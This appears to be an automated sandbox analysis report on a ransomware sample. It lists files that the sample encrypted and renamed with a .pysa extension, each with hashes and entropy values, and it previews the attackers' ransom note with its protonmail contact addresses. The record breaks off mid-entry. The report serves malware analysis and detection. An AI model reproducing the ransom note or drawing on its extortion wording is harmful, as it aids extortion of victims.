                  SSDEEP:6144:qPw/7LikFcQU4XbMFLv4n8L2tdQSEdVBksIRCn6vGV5T2n8Xxu:qI/3QQPM5M8dV6Ji5e
                  MD5:1BF1CF6881DEC7FFBC3050613DD7E4D0
                  SHA1:DB574612EF32C5A35D7F6EE911B0AAC4F26F05EE
                  SHA-256:BDFC1AD0C9E0BCB3C74A0F1A3DBCDBC0C1831FF683BC1B11DBE0C973A255DD55
                  SHA-512:5CD20167AB648A6F18B20769EFB63ED24DFD9BAA9C95E9DDAAECA437CA2E527BB3B43D236E92265215B9E43689B88540008F074F88DDF8BB8116F2C91B980BD6
                  Malicious:true
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):411648
                  Entropy (8bit):7.999210711184984
                  Encrypted:true
                  SSDEEP:6144:4WR58BJWf9muj2WItsNHMuA4QNPWf1PZQlvwpht+W8LQ1f/scTl/J+gk/3gom/nP:4K8ygtsyT4EwzQvwb8LCfhxzoYGBa
                  MD5:E020466C0698798EC48A3A162D1DEB6B
                  SHA1:9180DF378B3AEE876F42610B3CD08C0C21A39A35
                  SHA-256:D45030CBB39BB961D48519A3A15805A0552855BD878A6C9136768D8876013EF9
                  SHA-512:F755C2544E47541A9F5091A939D037685E78E4320C7C5DF3173075B942435883DF2F97950782C70DBE452F494E8CA9379C98F145F0F10B4FD970FF2CD857793C
                  Malicious:true
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):923648
                  Entropy (8bit):7.999709357014231
                  Encrypted:true
                  SSDEEP:24576:fdmwBVdsk6a9BtNjo+wLw7kwB5cdNq5MiC4FKscMo4:FmCsN6BP3wuVB5GNtkKVMd
                  MD5:40D01C03D15196CDB9A7B15D1D7CD9DE
                  SHA1:FB622A57D971EE6B85D735142092E8FB8612CE61
                  SHA-256:6C4EDE9E1FDC486B99765725A3DD4E89708754B8430814E8EC165745D5FAB291
                  SHA-512:F4F30FCA2E45DB0BCC6F3C1BA91CA3926BBF36DE24B97251A7C30A62AAF8ED515B1F5FA578913902E3A5DD70E163D8CDEF9E87C735BE8AD05765A9CA8EA91C2D
                  Malicious:true
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994737334542135
                  Encrypted:true
                  SSDEEP:3072:IUhykdRw+INYtqpgJB0DBfr3Z8CCBmxuV:IUhykdC+INYYpgMDBD3Z8KsV
                  MD5:E12297B410BEC3FF9A4A93C83969308E
                  SHA1:1412E67518DFE75717386376CF85474D37D32D7F
                  SHA-256:7DFE1FAAC50A00823300A14321B44DF528972A2A14544D50EB76DF22244C03BE
                  SHA-512:EC2D804E015A6B0120EB9A934889F53FF51DA2471E2E2DA86ADE3D90A8299F3F94254D72187CDC754F84EBDBB5B5BAA1EB7157AEFFDAFD92AFA4793E3C1BB0B4
                  Malicious:true
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):78848
                  Entropy (8bit):7.990936632219131
                  Encrypted:true
                  SSDEEP:1536:ETdURrqUpWxDPOYNZU7+FkvwnLYvq48r3WRrqcGMpKHYaLISK0:sdURr7/FbaqqYrqcGMsYaLS0
                  MD5:AB886B38C82F2CCDF7CB3849705EBB64
                  SHA1:617117DA83A25307A2C9FC629028CD43D3E3345E
                  SHA-256:75E4D28341B1601668E0FAB6D4FC40912EE9A9C08B55569B2C29E80C08D17ECE
                  SHA-512:6E5F01922D064536ECA50EE7DD05A884692995CBFC2AC39F1001A1C1D637A4248A13BA0259FBCC25C8AABEDF4B2401A7AE6795020899239F15A4DD170588AA0F
                  Malicious:true
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):58368
                  Entropy (8bit):7.985038711177283
                  Encrypted:false
                  SSDEEP:768:LSpxASgsaSEGROdrKCiSaLO3RA/ygxxSu2PdqrS1/Qat4olUgDn1mU3JsEYemrLQ:L0xssxEqOdrKeRExnwd0Srpl7D1hAs
                  MD5:86C6DE994F2D72072BAE9A104B86797D
                  SHA1:2A7FBAA1F195E82FF57B46EDA5550F0491DB84AB
                  SHA-256:9700D570D435296CBC9849933E620849D424A34D7D8D6E745E8B31BED0985FB8
                  SHA-512:03103F4E5A67D2DB328EBE7D1CF080253F337AA86EEFCF5394EC14B484F6966FC894FBD0E899C47C04D248C8A3B318CB9B0990D2EAFED1D8F79CC8D58C20B6A3
                  Malicious:false
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):41984
                  Entropy (8bit):7.974353015916477
                  Encrypted:false
                  SSDEEP:768:gPZYEBStOSQ4gE3lL418royLt56AAB4o97JaYT6YYwBLQxC6Dvh9M872DD1t6Kmt:kPSE4tLi88+JAqGJrT3DBL+C+vt2n1Jw
                  MD5:CC8F17DE7C277761C3820340DE682B0C
                  SHA1:C591C1374CC7AFB41B53CB4A0E0A4A1928D611EA
                  SHA-256:B6E4A30A5F97ED93786ADC75DD287DBA29D1715718E27CC03B849B1AE84EF293
                  SHA-512:87E7DFC3F0CF376590FFD2316521EA86490CDA1FCB8697DA9253F1F2E418CFD6489283A74745DB8A0FA548BE6A9FA645AAF5A5B839D03FD0EFD6D068F02BD2DE
                  Malicious:false
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.993980861524835
                  Encrypted:true
                  SSDEEP:1536:QbiusZJW1rIR6Ki9yaIlZ1gONI7QPuPU9SoHJG9x4GbWOAx09IQasDNeV:Ij2if96lLg+I7KLHJU4Uw8RU
                  MD5:864AD02F8A2C31370037C1251F6A3F9A
                  SHA1:902994D9DE21E74A3A6D2E1AC1EC3487FEAC2FC5
                  SHA-256:CE118F402BDEA4DDB4163C8D3E984CBD21506AE2C78A9D7080CE2FC5B4D849CC
                  SHA-512:A7E6BC6ABEEA4432D7B82A3351EDB660006FEED7A386859FB4946A0101CA9AE773E0BB0F1F12DCCBE0C2F8C6B9ABA624CC227E2A65876A6A2305F7AEF8C7BFE1
                  Malicious:true
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994374073707696
                  Encrypted:true
                  SSDEEP:3072:uDv8Cl8Auet52Ps7PDJcxkKglPj/FXjoLglo0:unQC2MSkTZXjoW
                  MD5:9B2D7D8F4A870AC8C808ACFA4DD81B48
                  SHA1:065AE4CFABBBF2CC51414A640B17A5DDCCB69E7E
                  SHA-256:5A61323B48EE3C1446D1ECA2E67187B743A9601FDFC182AF8D502E6BD249230E
                  SHA-512:4087261A29AB3D52881B0381FF402868B34C1E50B6AABDE113F8E6F4993277C5738B89BA73DA048D7158053D29F171E705D330384A8185697C7EE022FF3ABBCC
                  Malicious:true
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.671702072291653
                  Encrypted:false
                  SSDEEP:192:oqJal3W/lUaU/dd0Y2DuoT/Z8g+fbRd5qmnGJj85R87ADqpBHgbyb:XJyWdUaU/XqZ8Lf5dns8R8+kB0i
                  MD5:5482223898DF4C0548A73ED5793E8471
                  SHA1:B1259AD876F6B3D1C8DD76175C2018D6C79578DE
                  SHA-256:FA27E5642B729E883CD2E4F82F1F0272C0136706DDC8B0BBFFEC75EFC39FC855
                  SHA-512:F1792A5C996B4FF4E455798710C630C877678084515D58390227F74C5D8E7915A318DFBAF5CD657C46D79D11BA275BF480ACFB647BA693FC29D7E309805AD11E
                  Malicious:false
                  C:\Program Files (x86)\AutoIt3\Examples\COM\Worksheet.xls.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15360
                  Entropy (8bit):7.855591081585588
                  Encrypted:false
                  SSDEEP:384:rMJztCDqfSXq5nGz+s1Lxcr583pa8CuGtB6ycMcvCuuL:ryzojuGzP8r583pa8UtB3cvCbL
                  MD5:89632BC3E61130CEBABF36BE3E626754
                  SHA1:6942C4CC041AB12F195DAF599D2EAFAE525D8083
                  SHA-256:410EBAAC50F0D8FAAACD5B5AA4D783018F1E0F73DD64DB1D095005812F6506BD
                  SHA-512:B655947729D5CE08BA4B4E951452C19C40308E7571572B34AC017EE0C458F0B8B51C0A2B3F6D8BB37862D107F37A11ADEEC2125011D687EF81ED66C4FA75915D
                  Malicious:false
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\Test.doc.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):52224
                  Entropy (8bit):7.982144359092321
                  Encrypted:false
                  SSDEEP:768:UiJqBpZDltVG4AEXKstEKjZ5L9GxU3hYgsA5qEawgIcu291s0BA6FHECO7zloa2p:U3BpdVg+3tEuL9gCDqEU/BPk39oH+G
                  MD5:32C42E294F23A7DBA52D211B1D226925
                  SHA1:1B2CC637BDE31A39164A38F129FBB235332AB71F
                  SHA-256:A87F93DD04C63AD3D900D5C80C04477E1347FF9BE597F09C2CAFF52D4F639367
                  SHA-512:9F06D4999DB911C86978C9329480085EF05877EEE2BD4745E73E56F67FE2335A4AEE2042096E038F17440EB666A815CCE6F58A0D24DB1EC91E712B8BC44055A0
                  Malicious:false
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\Test2.doc.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):33792
                  Entropy (8bit):7.961745073836898
                  Encrypted:false
                  SSDEEP:768:6BXryh1e/1u24li3OfZGc29KnsxYd7v/IrrJTL0cLkUH:6ZmH01n4lMoGc29KnsmcrJbb
                  MD5:22DD9F0A1B109A5F3F90B199C6DF1F1B
                  SHA1:D927D25C893A177D466DA397A076749B6B9A4C3B
                  SHA-256:B80DE3A3EA6F77D73A66F3F3F87422B4DF44362919200B157942B53FC38F0570
                  SHA-512:18A61F3D82C91F03C61663523785B34959ED31F673F6DBF99297F31A9F852652E02521900A01A7106A5CCAB1EDBDF2A43EDE9C7A466264F27C964F8B7AF34124
                  Malicious:false
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\_Excel1.xls.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):309248
                  Entropy (8bit):7.99892925625825
                  Encrypted:true
                  SSDEEP:6144:YbQ2/yurkH6U8O0ZdZcTl1hfkGZ5Bqhv0or1GoHbix/eUlJ66SaWquMtB8/b:eQOyPaDDCTl7DBkv1JSJf/duMtkb
                  MD5:5CBA3DA41F0E461DF0DB05634D693E38
                  SHA1:32C2A22CFECF673376B3292EF85D595EDA1314BA
                  SHA-256:EE31205352442ACD16F8D0711862EC18F5C3F03E80A53A6769AB75D499ACF73E
                  SHA-512:ED0155E866830F10BDC162EC7E2271845A26594215CBC9069A6DA696D4BB2AAA661BFCFADBBDD6723AC8CE8651E34DBAC3765DA7CFB72F199C5F2AC3A23A3D0D
                  Malicious:true
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\_Excel2.xls.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):411648
                  Entropy (8bit):7.999389779322184
                  Encrypted:true
                  SSDEEP:6144:Y52hLJusyPw65UTAgUbJgZvDx0hCvW80eewjwgtt9LWHhEIao1Qp7zj:YClpiV5sAgW60hCeSwgLYmIO7X
                  MD5:F4CB73309BB755199401A13A72C019EB
                  SHA1:B39762435651B50FF1A498C3C119EBA4A52DCDD7
                  SHA-256:8E74CCD071915C150B0627035818390D078F2B8732D4BF806A3B1157CEF21450
                  SHA-512:1D5DC9A7AC97B45275F5FF49A6E99DA79494015DEDFDA17DA5F416B2F42119CBEF99E7703E97A8D62D508EC3817DE015E0496626FE6F87ABB860F88F707FE3C6
                  Malicious:true
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\_Excel3.xls.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):821248
                  Entropy (8bit):7.9996890542661525
                  Encrypted:true
                  SSDEEP:12288:csq5qtTmHDzvSxGPmb3WhCe5jTeS0d9RbRQxULh6WKWplClYttOaxuB8:4OmHPjmydVTehRbWxa/lYY7Vxo8
                  MD5:44BA4CE38C29C2CC974C402349A66139
                  SHA1:B3C1532F4944D0B372D10885F322CD74D7B05B40
                  SHA-256:B2A5C85253F5EB8439BDFC54A5C2B54D41EAD1ACB60B31AD0C4B0F0D8FF84E3F
                  SHA-512:8205E866741679164C69C9460010F2F153EA32A334918E58FDC0E270150493D25511CF930B1D8309BF17A97DEAD6ED889D191D67703CCFDBDB962C90C65DF610
                  Malicious:true
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\_Excel4.xls.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):25600
                  Entropy (8bit):7.940596673597301
                  Encrypted:false
                  SSDEEP:768:yohfclv/P4d9KLIYlVSq69k9z/OR/6IRi96:yohfclvn2KLIYSq6ozWZzRs6
                  MD5:22AC35BDF5434AFB9D5C845F7F07304D
                  SHA1:70CA56A054ABDF7856A077636A2317B8F2D2ED14
                  SHA-256:3742271BA4C04338772132287B0DD73E73C1BD761DB4F8B7BC660EFE46517F17
                  SHA-512:D966E3B42D1312CA305702AD6BD91A97D512C4339BE26B25DC3CE37E8B42484CC432A9AC835A3A150BB0C629488D6A42893304B3394B7D19D2D04C1D85D31EFD
                  Malicious:false
                  C:\Program Files (x86)\Java\jre1.8.0_211\lib\deploy\ffjcext.zip.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15360
                  Entropy (8bit):7.858624509711282
                  Encrypted:false
                  SSDEEP:384:tZCWYykFDiQuo/iPbYSQfDILLYLA/rzBL+5ll9U:tccfzYSQaomzB+5ll9U
                  MD5:9B88319B5911F1AB5AD660355F847B3B
                  SHA1:C08C52FCE16EC3A7637BF8B6DE576B32D027F472
                  SHA-256:EF483A9AF808BD1188432BF6F27E06EEF53B5B03A793B00D47EB3CEAB3B92AAF
                  SHA-512:B04BF76AB6113AC0EBA4D8655C2C8967E6CF1AE8122C1EB6646CE39AE5290F230748DA135C72C15294CF51B0CBEC5CAF3F5C0FADAE7FEEE4275D821B2CE44003
                  Malicious:false
                  C:\Program Files (x86)\Microsoft Office\Office16\1033\PROTTPLN.DOC.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.919061329435883
                  Encrypted:false
                  SSDEEP:384:HJGytaw7/a4f46/4W2+xkykJ4Nmpaibqvr9elIKkkgjC2Y/XwzRI1LZ5rNkH:pPtaw7iM46QWBzkJ4EpagoWkkgzGXwz1
                  MD5:EF08203F1DDE547C9037A6E0538DB42E
                  SHA1:A9DAC678F71FFB70C4F268F5621DE3C9D3461E62
                  SHA-256:C601FA0BD7D5FA3458B9F0A15B88A674622C1C77DEFC99E55F475AB371CA7AE5
                  SHA-512:0CD6C24628B8AF517321C33D5F4B9B28F6D4BB52514A675ACAF9E592D62268C1508D0F48CD1DCDB65B2116D57A76E563929D505DF27A021862ECDEDA57A18C74
                  Malicious:false
                  C:\Program Files (x86)\Microsoft Office\Office16\1033\PROTTPLN.XLS.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10240
                  Entropy (8bit):7.720612944457185
                  Encrypted:false
                  SSDEEP:192:7V9H1FXvwdzcCBd+jHR/d8kxWXKJeVvWbIlmQoLoH1pQUBIewAzc03F1A5gRSlrH:7V9/XvAX3EtKmCMovmIlFoC1p62rTSlT
                  MD5:E36D96E597FA999E90CB8EC523D63FB3
                  SHA1:5FDBB61D379DED303D7381DD37FF5A3F71DBF57D
                  SHA-256:C5B8B0BC1A27E0068D4D82B1DD120029AFBFEBFD8C70AF86CA5550015FB2A871
                  SHA-512:B8D05119F2BE5ADC8459D4E0BD2416EA37160D2FE31EF242F56F7DD7760E0E34EC89B37D544E127B272D513C4FC356668E24AB74400D4FD46D837C439FDBE252
                  Malicious:false
                  C:\Program Files (x86)\Microsoft Office\Office16\1033\PROTTPLV.DOC.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.917888116721629
                  Encrypted:false
                  SSDEEP:384:cKUieFRbgTkIDBbE2+kuELZ8tVItX2c3PIbayFwVGnA2pj9aLWjTX8+d:cNVJQbE2TuELZ8EtX2qijFSGnA2pZaLs
                  MD5:852CA8A18E5EF5480380E98223130D70
                  SHA1:BDA09F66BA7892C67BD6588EE2BB51F048F86AC3
                  SHA-256:BC5949F23394B67994377D0BA9377D4A48EAB7D1CE81BF09F6F3C59DAB6150C6
                  SHA-512:C24951A11B5E421378D3D6F9AA68833EF0C112103E65F51D7BA8EA51046020F39DDC47449BECB1AB24F001E5B781B71E8FE23A368A4B5AEAB9016290EFBBF8DC
                  Malicious:false
                  C:\Program Files (x86)\Microsoft Office\Office16\1033\PROTTPLV.XLS.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10240
                  Entropy (8bit):7.718405855722776
                  Encrypted:false
                  SSDEEP:192:Zm+32xcOZwFJlJJsoaxOk21shNVbf1dGyENTO1iVcOhV:ZmO2eRQotk2qhNBN12TO1iVl
                  MD5:76B7A562A391CCB97C7B2CB8F5F2FCC6
                  SHA1:8167416CFACF0B3EC085D9B0C7F255169722D12E
                  SHA-256:8B3259E332EC2A4703F04A927C71114EEC1B1630337629D89699A561E3003DF8
                  SHA-512:E3AB39648D700824AF4BB4255E3D837AB856CA6EC44E133413F45282C56EED63AC6377EFF86869D72AD480F9B366BDD503C9B72B3ECA49575630BC980013E857
                  Malicious:false
                  C:\Program Files (x86)\Microsoft Office\Office16\Ocomprivate.zip.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):90112
                  Entropy (8bit):7.9937492606316995
                  Encrypted:true
                  SSDEEP:1536:MYhUHgBUFctf3iHu+M2fCXh1VzLgK3vOuJD2JL5W15CLP:LuxS13iOX2ShvgK2M2JK5M
                  MD5:6B3FFFC96E79572E1136E12B76D5D622
                  SHA1:8167EBAA88B61BF2DF7A5480269BB93BD5F68CF4
                  SHA-256:3B8B9D206E30658859E964125C11257B682AA84BD31AD5ABC6DA86C9B9EB5098
                  SHA-512:1B87D935867AAF504EB46BC2B9C999E5FD2F45AF91ABE495EF40AE7CC95AE90A4032FD99524EB7666054DE8EBAD3DD083134C0AEDD62CF25FF8706F78034A7B1
                  Malicious:true
                  C:\Program Files (x86)\Microsoft Office\Office16\SAMPLES\SOLVSAMP.XLS.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994052733481324
                  Encrypted:true
                  SSDEEP:1536:MXXJmRSHV8hn9kUvxXLUFNxThZAgc1lECBlaLQiVnJ8r19D3sXNnXIMY:MX5mY1gD56wgc7deRO9D3sXhXIv
                  MD5:5099E00DF7E65169E1150CCB14E90AAF
                  SHA1:A64A2EDAA0D4B343F209FEAB0AB08838F4120FFD
                  SHA-256:270CBC7091B9B13D1FE43E0C0DC752817D08A6658E90702C24C72EAAAAE3910A
                  SHA-512:538C814B40B21DC0F6F39BA26E164542F957B69CB8C250EEB2D382A788F7AC3BA8F67D6327F05BEE014B4D032E4C38E81C607FF62953AB0D37C6F7BC262EFA98
                  Malicious:true
                  C:\Program Files (x86)\Microsoft Office\Office16\System.Windows.Controls.Theming.Toolkit.zip.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):13312
                  Entropy (8bit):7.817411287727557
                  Encrypted:false
                  SSDEEP:192:hx9aZQnB9BFiyGsdDuItk03HH7lz7fUKZECdjh/+wilixl1DHlpoa+wyvDQ8sEZ4:heYWs1k0X7VrZzhaYlJn4vMxDGW
                  MD5:D9ABBCA5D5D66BFBEC2EC9B1F332CFB7
                  SHA1:03EC05567EF09BD26ECC1ACA86F68A46ACF245EB
                  SHA-256:6E0214C6BC6D46834B159B7BD6EFE9D7F1EC7B901F6BF0AA04F23EF7060B1889
                  SHA-512:490CF91BC2121A0EF27C6DEB45425C2C3D468647EE3E7DFD4CBC2154E155BEB51545FD62C291A0504A9A7D6C4BEB210E16C660B9146F6C7C3B7D653C5DB5D8AB
                  Malicious:false
                  C:\Program Files\Google\Chrome\Application\85.0.4183.121\Installer\chrome.7z.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):22519808
                  Entropy (8bit):7.999991216410175
                  Encrypted:true
                  SSDEEP:393216:VvcWLvM7LjkAtoyoaaqc4fb6djbsDL9Fl99f2X8g6HtvMPeAlXKkti+30BgGlD2f:VvcWLvM7vkAtoyoanceb6df+RH72MgOK
                  MD5:FE80A0BE2AF51D40342DA75C44BB05E4
                  SHA1:6CE19764BD30E70BE852B816BB90A9E86F063BA9
                  SHA-256:3B929EC06C397C2CB60DBD2032AA90B86F2867B6259075ABBD205BF41107E009
                  SHA-512:22253AAD61E2C744AC470BC758C12D7E1A0D61225A002F38A9AF100A82412AC1B00DCC319DD914B5B1C07B5290E41952867850A15F7DFE6A5DFC3CCA4AD92E02
                  Malicious:true
                  C:\ProgramData\Adobe\ARM\Reader_19.012.20034\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Adobe\ARM\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Adobe\ARM\S\436\AdobeARM.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):923648
                  Entropy (8bit):7.9997451425907204
                  Encrypted:true
                  SSDEEP:24576:jV7Bg97KUfgIBbjVyoKSZm7UBlmHbh9INtm0Prl5IAmk:ha9FfgIBjVBc4BlojINtzrl5IAmk
                  MD5:F9529264DBC60B06FD0CFB0D822DBEC5
                  SHA1:8C7AD4A206A70034CB23C72FCF1252C6215DCBFD
                  SHA-256:2B2077944C2EDEBF48C7998F406CC32C5007073C1CBA343E53F8F9007C0FA44F
                  SHA-512:FE884D083A9058B338FA86209074AC4FCA39FA39C4EF4B9D381D544498640D3E2E25B87FA247048AEB0325F71B3E00A23F709A4D3D609B2D6607DC01E6B8010E
                  Malicious:true
                  C:\ProgramData\Adobe\ARM\S\436\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Adobe\ARM\S\ARM.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):923648
                  Entropy (8bit):7.999728877983258
                  Encrypted:true
                  SSDEEP:24576:+aWtfnMWUQv3VpcSUMojoDZHVDHLm9LHX6H36:ZW9MM3MFul1DHLsK36
                  MD5:6AC0F40904604747557376A051B5183A
                  SHA1:487F398EE4A4A270805D045BFF2DD7176D93AAE7
                  SHA-256:35C16D744F2DD5E9F0DA49A40B09CB25121E11BB18D8B69FA790EE873D459D74
